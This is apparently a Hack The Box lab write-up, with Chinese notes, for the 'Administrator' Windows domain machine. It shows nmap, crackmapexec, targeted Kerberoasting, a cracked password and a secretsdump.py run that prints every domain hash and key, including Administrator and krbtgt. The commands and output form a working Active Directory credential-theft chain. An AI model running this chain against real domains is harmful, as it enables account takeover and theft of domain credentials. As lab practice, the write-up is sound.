Administrator

10.10.11.42

info-card
info-card

Machine Information
As is common in real life Windows pentests, you will start the Administrator box with credentials for the following account: Username: Olivia Password: ichliebedich

给出了初始账户:Olivia:ichliebedich

nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
# Nmap 7.95 scan initiated Wed Jan 15 19:05:28 2025 as: nmap -e utun4 -sC -sV -vv -oA nmap/default 10.10.11.42
Nmap scan report for 10.10.11.42
Host is up, received echo-reply ttl 127 (0.11s latency).
Scanned at 2025-01-15 19:05:44 CST for 193s
Not shown: 986 closed tcp ports (reset)
PORT     STATE SERVICE       REASON          VERSION
21/tcp   open  ftp           syn-ack ttl 127 Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
53/tcp   open  domain        syn-ack ttl 127 Simple DNS Plus
88/tcp   open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-01-15 17:50:12Z)
135/tcp  open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds? syn-ack ttl 127
464/tcp  open  kpasswd5?     syn-ack ttl 127
593/tcp  open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped    syn-ack ttl 127
3268/tcp open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped    syn-ack ttl 127
4444/tcp open  krb524?       syn-ack ttl 127
5985/tcp open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-01-15T17:52:57
|_  start_date: N/A
|_clock-skew: 6h44m17s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 35406/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 46836/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 52617/udp): CLEAN (Timeout)
|   Check 4 (port 45074/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked

Read data files from: /opt/homebrew/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jan 15 19:08:57 2025 -- 1 IP address (1 host up) scanned in 208.89 seconds

crackmapexec

1
2
3
4
5
6
$ crackmapexec winrm administrator.htb -u Olivia -p ichliebedich
SMB         administrator.htb 5985   DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:administrator.htb)
HTTP        administrator.htb 5985   DC               [*] http://administrator.htb:5985/wsman
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       administrator.htb 5985   DC               [+] administrator.htb\Olivia:ichliebedich (Pwn3d!)

一上来就有 shell ?

winrm2
winrm2

但确实是入口账户,看起来还需要进入其他普通用户才能获得 user flag

targetedKerberoast

1
2
3
4
5
6
7
8
9
$ python3 targetedKerberoast.py -v -d 'administrator.htb' -u 'Olivia' -p 'ichliebedich'
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[VERBOSE] SPN added successfully for (michael)
[+] Printing hash for (michael)
$krb5tgs$23$*michael$ADMINISTRATOR.HTB$administrator.htb/michael*$a8bf671eddb8ecd101092866fe796ffe$3cab0455b6bce22b7236a40188d0bb106c28d01736668276ae2ed966d313c5d79ec48fd72bc495e0bf13b7e7e8eef87838157908a5e51aa4bb4add8e2b8119d5c50cbfcde86e1a9824582ca6a2056e5e8272ce15721804ba538a761ae57fe1053de42a2ac21ac98ad899f3a276a1c8b6f0ee07418ea2963883bc16574659212726e3030fa4f79fb4f4a17a55b71f1eff50a0fb790e5f81a523a6cd23924d1c0e0dc455c24659f5a59344e7e2b1a376b0bf157f42f52ebfc0d9fcfaf98b5f785c8ce78a2f8c4e3b68f0ea6802f77f1c9f7942520b862befb829286efd0a59d3ae03ba0982452da583ff27d1a4fa088b4de10d5a68de8622dde7eba5319b76e0617337c292c184945c67911387812e62ea2f94996ab82869a66b87d004f66c824ec1dd08cbe8d1198e03e0537a01f05ffcd726f6d08503b832bbbab6052edfd421657749ae4eeddc5496ba84d35fe64edf6154b08a3061836111d57e06e7bdfa38cad3e3d0e27e168b6103dc358b8901a9fe3a216a16dd486363767695eac8a1022bce72768b7a1fc2ebccb1b53f7a06394b4dc63a8d0f78534c38eea827bd4f7bd2d4052feda16dc7e0974869f6ce619adab2ce79abedf61f74cc86501bc58a660b9c372bb2e597069559bcfbc5fe8c5657fdf38ce7d685c7fb17133460ca8d525d46fefe8bddcd60cab66a01534893bf7e4cceb6953a2995fbebf6cedb845f85ceac1eae55f0a8463a2752ebf13eb85f9c1ff13edbc8c26833291609cd10d39261478f77cb386827d5b6359ca19e57255fe5f4781c3b8c54b6c62c9f6403298a5a8f391107db59976925d818a581477cbf2197025f3d05f7459d7dea2460eb7aca004362f9775a9983639baef7ac352186328e56ca1abff7ab34181b0ba82c70adb7415d2b0d8ffd74f49ff57e0295b909d182ea6ca44b8557815ea9c5d3116cac6117cbe555cfd74a6ae19aa13fb106b61b907cc9709e41e6fd36f767c88a6594c8b0370488b27a843a08b6749d183403a707887c33ec78fd10b908ad6e929ec8354a3c7b721bd96fe8d633f0d00afbb8eb0f50563573b1758bd6e87ba4ddbcf8a18db1ddae370b8830b2da2c2d5e24c499ed3852aa4ca93ae9e148c4a3643bd57b1cbf5bd229b82ca6928f893c32ffd985d577f031fbc2972733711a255075f22580e7040036f6a5bfa3f39277d44fc26aa2c419f902c9a75ea1f4b6539cc0c9bffeea8db51f4a11aa410847fa6ea2bb28741eb9538bfef62b61006e7ae57e2c0ec8df9b58a79ba118e4fe66c2c95adc809744783ea2de8f120c75b6796ac5317060ac7fc5e2f571fde498a6b39f2fd49c2d1f7eb52f1801a6783f798c011372a6d4bf0f26578bc009e8455569a9187b55747a9f35746e588a86340f4fe125b5a6c29bda34c8c28a083ae9c489cdc41320731b3cc8c6384a77865f1a372b2c1659b109dede12f8ce42489b0c0c3ebdc32a22ac951192db77b0bc2a0a4ca7240b767bd8c19911dc4018d2d69733426d74aee657a23d8d7c
[VERBOSE] SPN removed successfully for (michael)
[+] Printing hash for (ethan)
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$64e00f052e9895dedd10b92c02857d3b$61473b8cfee7bb0ccc99d2c42b0af5528d31b2345401a270b2cba2aab686295cc0a9eee6b41bf41bed8bd7f90549a9b1a8ea1de8d374c1c3e16ee7af855b0301c3378bfc2885300c8c30b37522d475679b726e735e4b589d608b8d46d697a39e563c33ba5aeb522024f5631ae845fc7351d7aef34ef5ceff38fa9b023f2f9a8e580dc53c75a8402597c66c9379b68bf4a28fcc19b5b5567c06070cbd73ff447fd63cc9195ba42b09d516ec622f0e2db6821e8856fea9022a6dffe6bef62fae34c98767a6bcbc82bc4b029cdb0f72615cd5af839cf4a894c2cd79d04c1cef715059a45779b94bdde3dbf7361514a508f5e3c234494a76da551b9473e5b6bd5480e8296f568cbad74373d24b14b18a28b6e77ade2e1709161b1c834ce094edba4d5ab8201f871e1f482b6b57149a8c13ab134103d1747e89d94e021bcb1ea4d9b819b8e37cba291cf48954fec71065d9e7bd0385aac4334540d13168846fa94a87c0375a024ea098979e7270f5379b664caf5ee1df18957e0802fcc6cb9eab59f4ace7527e56c82cbef5089ef8bd873b4b984ceb62d512e506cd536cb356134b3a88049ab0b4b06b9d4dc724db83e494076a6802fe52750fa6de613e9931f7342cf540e460fa0425dff63edc3932ae0a1ae1fe73a852846d45472f9f5c5e9f20cef996c5fc9c73b8dd2144a0c20b1dd08a92ad49a209ec0ddc49523c15ec53bea12088a40cfff5bfd9d9f65e24ad193e552fd9977821ad0016b5ee8c3979bfd7c8f725e2352a07b0a875705b42503f66bb1301f217582d915f422aad572aeb17c9fb0f4aa338c0080afe606ec879031a23482aedf8cfe3492c182c668a73dc5cb9af229494eb9a0965a7c9f878f5ce103f761953e3076fe330430f1b4a6b3f70abbac4f5fc234033cd8684ef6acba0e2fa5e81092589ee5be15a456e276a221ec15edd729a8ec82d5d2de9f62bc29f0162d50206a77ecdf4ed329524a1268e974890ef5e3c8a737245b6ac8c7bb8128592263be9aa27704f9d1197e9955fa37b5c84f1d2c70426358924558d57d9db839e205ce28a969e5490305ca1b24a58ba78c8761e1d1116534540763d8d6a0e909edc43356697101d90e8f48e513b288574ee592c86a5261e85321bd31b57dbeea1a4221eec0429a957554f590a828a8f2706bfe41b551e058f7dba44f32fe8176787187963c83aa6ceac39002f53b739be2468a7314fda0d6a9c12d59530c2b46917a4f4c3b2a34b05aebdbaebd65027c241ffcdbd56649419f4a7987827b1c090296a27512562abda6e42e90a6a8f9844e72f4604dfde869eb5c389384171ba84f4ff033ce2d592de6487e556ac2eef7dec89efb0c226ec9811526338024e644b451b7a957031c996b43f92d7ee2ec510a90f12f18a4d3c270ef9a37c88710af17e8e823f4c3843e8eaeae02bf3301def2a7cd5de702fe6f42a1dbbde877a237bafd8081682bd7ae5361df724a571936dadff3aba5525b0f1cd971e61b8b1b21a5100c9a93122cc59
hashcat1
hashcat1

获得凭据 ethan:limpbizkit

secretsdump.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
/ # secretsdump.py 'administrator.htb'/'ethan':'limpbizkit'@'administrator.htb'
Impacket v0.13.0.dev0+20250109.91705.ac02e0e - Copyright Fortra, LLC and its affiliated companies 

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1181ba47d45fa2c76385a82409cbfaf6:::
administrator.htb\olivia:1108:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7:::
administrator.htb\michael:1109:aad3b435b51404eeaad3b435b51404ee:2646627efc8304eeaa02b09d79deaf7e:::
administrator.htb\benjamin:1110:aad3b435b51404eeaad3b435b51404ee:2646627efc8304eeaa02b09d79deaf7e:::
administrator.htb\emily:1112:aad3b435b51404eeaad3b435b51404ee:eb200a2583a88ace2983ee5caa520f31:::
administrator.htb\ethan:1113:aad3b435b51404eeaad3b435b51404ee:5c2b9f97e0620c3d307de85a93179884:::
administrator.htb\alexander:3601:aad3b435b51404eeaad3b435b51404ee:cdc9e5f3b0631aa3600e0bfec00a0199:::
administrator.htb\emma:3602:aad3b435b51404eeaad3b435b51404ee:11ecd72c969a57c34c819b41b54455c9:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:cf411ddad4807b5b4a275d31caa1d4b3:::
DESKTOP-R3VRMMC$:5101:aad3b435b51404eeaad3b435b51404ee:1defd015bbbdc37a46d83fc9e4718ef8:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:9d453509ca9b7bec02ea8c2161d2d340fd94bf30cc7e52cb94853a04e9e69664
Administrator:aes128-cts-hmac-sha1-96:08b0633a8dd5f1d6cbea29014caea5a2
Administrator:des-cbc-md5:403286f7cdf18385
krbtgt:aes256-cts-hmac-sha1-96:920ce354811a517c703a217ddca0175411d4a3c0880c359b2fdc1a494fb13648
krbtgt:aes128-cts-hmac-sha1-96:aadb89e07c87bcaf9c540940fab4af94
krbtgt:des-cbc-md5:2c0bc7d0250dbfc7
administrator.htb\olivia:aes256-cts-hmac-sha1-96:713f215fa5cc408ee5ba000e178f9d8ac220d68d294b077cb03aecc5f4c4e4f3
administrator.htb\olivia:aes128-cts-hmac-sha1-96:3d15ec169119d785a0ca2997f5d2aa48
administrator.htb\olivia:des-cbc-md5:bc2a4a7929c198e9
administrator.htb\michael:aes256-cts-hmac-sha1-96:fe62b87a3fffb66de6a23aed770bf0669d2fae0f8e1ff8218cbf3009fa92e8d2
administrator.htb\michael:aes128-cts-hmac-sha1-96:db114bee18e4eabbb95f67ed6c64b58c
administrator.htb\michael:des-cbc-md5:151032b5f1899ee6
administrator.htb\benjamin:aes256-cts-hmac-sha1-96:40484480c0c688cf4d0c524ade20d15d109ed00070d44b5b09a56c6aa8c78e37
administrator.htb\benjamin:aes128-cts-hmac-sha1-96:491d1d10204726e0764ac0d8817851d1
administrator.htb\benjamin:des-cbc-md5:2f297f138f5161dc
administrator.htb\emily:aes256-cts-hmac-sha1-96:53063129cd0e59d79b83025fbb4cf89b975a961f996c26cdedc8c6991e92b7c4
administrator.htb\emily:aes128-cts-hmac-sha1-96:fb2a594e5ff3a289fac7a27bbb328218
administrator.htb\emily:des-cbc-md5:804343fb6e0dbc51
administrator.htb\ethan:aes256-cts-hmac-sha1-96:e8577755add681a799a8f9fbcddecc4c3a3296329512bdae2454b6641bd3270f
administrator.htb\ethan:aes128-cts-hmac-sha1-96:e67d5744a884d8b137040d9ec3c6b49f
administrator.htb\ethan:des-cbc-md5:58387aef9d6754fb
administrator.htb\alexander:aes256-cts-hmac-sha1-96:b78d0aa466f36903311913f9caa7ef9cff55a2d9f450325b2fb390fbebdb50b6
administrator.htb\alexander:aes128-cts-hmac-sha1-96:ac291386e48626f32ecfb87871cdeade
administrator.htb\alexander:des-cbc-md5:49ba9dcb6d07d0bf
administrator.htb\emma:aes256-cts-hmac-sha1-96:951a211a757b8ea8f566e5f3a7b42122727d014cb13777c7784a7d605a89ff82
administrator.htb\emma:aes128-cts-hmac-sha1-96:aa24ed627234fb9c520240ceef84cd5e
administrator.htb\emma:des-cbc-md5:3249fba89813ef5d
DC$:aes256-cts-hmac-sha1-96:98ef91c128122134296e67e713b233697cd313ae864b1f26ac1b8bc4ec1b4ccb
DC$:aes128-cts-hmac-sha1-96:7068a4761df2f6c760ad9018c8bd206d
DC$:des-cbc-md5:f483547c4325492a
DESKTOP-R3VRMMC$:aes256-cts-hmac-sha1-96:da192d67104dee9a078cafdd22006bb12feb6c47ac4ec785b7eeb88bb6824cbc
DESKTOP-R3VRMMC$:aes128-cts-hmac-sha1-96:dd26a9dfdcadac9c3d6559daec6f70f5
DESKTOP-R3VRMMC$:des-cbc-md5:5d9d345429297c6b
psexec
psexec

??? wtf,最快的一集